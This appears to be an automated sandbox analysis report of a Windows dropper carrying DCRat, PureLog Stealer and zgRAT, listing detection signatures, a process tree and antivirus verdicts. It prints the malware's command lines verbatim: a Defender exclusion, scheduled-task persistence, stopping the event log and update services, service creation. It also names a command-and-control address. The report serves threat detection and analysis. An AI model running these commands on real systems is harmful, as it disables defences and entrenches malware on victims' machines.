
Windows Analysis Report
C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Overview

General Information

Sample name: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
Analysis ID: 1431496
MD5: 6acbb1fb58dccd74db667187b22de689
SHA1: cf0df5b247b15157cfce47473d1b063705d10b44
SHA256: c792057cb761da8872421a6c906c4481b260bdb5d27b86378efdd2af39319687
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Found direct / indirect Syscall (likely to bypass EDR)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe" MD5: 6ACBB1FB58DCCD74DB667187B22DE689)
    • GargantuaN.exe (PID: 7508 cmdline: "C:\Users\user\AppData\Local\Temp\GargantuaN.exe" MD5: B3CEE15E9FDDC0E7DC33069319B549D6)
      • wscript.exe (PID: 7564 cmdline: "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • hyperProviderSavesinto.exe (PID: 7836 cmdline: "C:\PerfDll/hyperProviderSavesinto.exe" MD5: 3997D7D058AF3C1B6C9ABB57F6FA1F2A)
            • WmiPrvSE.exe (PID: 7888 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • schtasks.exe (PID: 7896 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7936 cmdline: schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7984 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8004 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8032 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8048 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8064 cmdline: schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8080 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8096 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8136 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 8188 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 7072 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 6692 cmdline: schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • schtasks.exe (PID: 3272 cmdline: schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 11 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7476 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7272 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • PING.EXE (PID: 7916 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
    • GargantuanS.exe (PID: 7524 cmdline: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" MD5: 7A568EF3F46D369F3D3FFD68FDF68573)
      • powershell.exe (PID: 7632 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7260 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 8144 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5640 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1068 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7468 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7768 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 7964 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • sc.exe (PID: 7976 cmdline: C:\Windows\system32\sc.exe delete "IFAYFBKT" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8032 cmdline: C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8084 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7676 cmdline: C:\Windows\system32\sc.exe start "IFAYFBKT" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • KZcLqgnLvRf.exe (PID: 8116 cmdline: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe" MD5: 3997D7D058AF3C1B6C9ABB57F6FA1F2A)
  • KZcLqgnLvRf.exe (PID: 8176 cmdline: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe" MD5: 3997D7D058AF3C1B6C9ABB57F6FA1F2A)
  • nhxnqwkhmssh.exe (PID: 7844 cmdline: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe MD5: 7A568EF3F46D369F3D3FFD68FDF68573)
  • cleanup
No configs have been found
Dropped files (Yara):

Source | Rule | Description | Author
C:\PerfDll\hyperProviderSavesinto.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\PerfDll\hyperProviderSavesinto.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(9 further entries not shown)

Memory dumps (Yara):

Source | Rule | Description | Author
00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
Process Memory Space: hyperProviderSavesinto.exe PID: 7836 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
(1 further entry not shown)

Unpacked PE files (Yara):

Source | Rule | Description | Author
1.3.GargantuaN.exe.584d6eb.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
1.3.GargantuaN.exe.584d6eb.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
1.3.GargantuaN.exe.6dc96eb.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
1.3.GargantuaN.exe.6dc96eb.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
1.3.GargantuaN.exe.6dc96eb.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(3 further entries not shown)

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\PerfDll\hyperProviderSavesinto.exe, ProcessId: 7836, TargetFilename: C:\Recovery\WmiPrvSE.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuanS.exe, ParentProcessId: 7524, ParentProcessName: GargantuanS.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7632, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuaN.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, ParentProcessId: 7508, ParentProcessName: GargantuaN.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe" , ProcessId: 7564, ProcessName: wscript.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuanS.exe, ParentProcessId: 7524, ParentProcessName: GargantuanS.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto", ProcessId: 8032, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuanS.exe, ParentProcessId: 7524, ParentProcessName: GargantuanS.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7632, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\PerfDll/hyperProviderSavesinto.exe", ParentImage: C:\PerfDll\hyperProviderSavesinto.exe, ParentProcessId: 7836, ParentProcessName: hyperProviderSavesinto.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, ProcessId: 8096, ProcessName: schtasks.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\GargantuanS.exe, ParentProcessId: 7524, ParentProcessName: GargantuanS.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8084, ProcessName: sc.exe

Snort IDS alert for network traffic:
Timestamp: 04/25/24-10:32:09.038045
SID: 2048095
Source Port: 49730
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: https://176.123.168.151 | Avira URL Cloud: Label: malware
Source: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows | Avira URL Cloud: Label: malware
Source: http://176.123.168.151 | Avira URL Cloud: Label: malware
Source: https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Window | Avira URL Cloud: Label: malware
Source: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe | Avira: detection malicious, Label: TR/Kryptik.gqhhv
Source: C:\Users\user\Desktop\zQhPhksn.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Recovery\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\PerfDll\hyperProviderSavesinto.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\WiKMUFpI.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\WmiPrvSE.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Avira: detection malicious, Label: TR/Kryptik.gqhhv
Source: C:\Users\user\Desktop\LugVktua.log | Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\KEMGRwnV.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: https://176.123.168.151 | Virustotal: Detection: 5%
Source: http://176.123.168.151 | Virustotal: Detection: 8%
Source: C:\PerfDll\hyperProviderSavesinto.exe | ReversingLabs: Detection: 87%
Source: C:\PerfDll\hyperProviderSavesinto.exe | Virustotal: Detection: 73%
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Virustotal: Detection: 73%
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe | ReversingLabs: Detection: 81%
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe | Virustotal: Detection: 61%
Source: C:\Recovery\RuntimeBroker.exe | ReversingLabs: Detection: 87%
Source: C:\Recovery\RuntimeBroker.exe | Virustotal: Detection: 73%
Source: C:\Recovery\WmiPrvSE.exe | ReversingLabs: Detection: 87%
Source: C:\Recovery\WmiPrvSE.exe | Virustotal: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe | Virustotal: Detection: 61%
Source: C:\Users\user\Desktop\IkSFhrpY.log | Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\KEMGRwnV.log | ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\KEMGRwnV.log | Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\LugVktua.log | Virustotal: Detection: 19%
Source: C:\Users\user\Desktop\WiKMUFpI.log | ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\WiKMUFpI.log | Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\msAjSsFc.log | Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\phOzxInG.log | Virustotal: Detection: 11%
Source: C:\Users\user\Desktop\vsaRQqFM.log | Virustotal: Detection: 11%
Source: C:\Users\user\Desktop\zQhPhksn.log | Virustotal: Detection: 19%
Source: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe | Virustotal: Detection: 73%
Source: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe | Virustotal: Detection: 73%
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | ReversingLabs: Detection: 60%
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Virustotal: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Joe Sandbox ML: detected
Source: C:\Recovery\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\PerfDll\hyperProviderSavesinto.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Joe Sandbox ML: detected
Source: C:\Recovery\WmiPrvSE.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 176.123.168.151:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: GargantuaN.exe, 00000001.00000000.1635712049.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, GargantuaN.exe, 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp
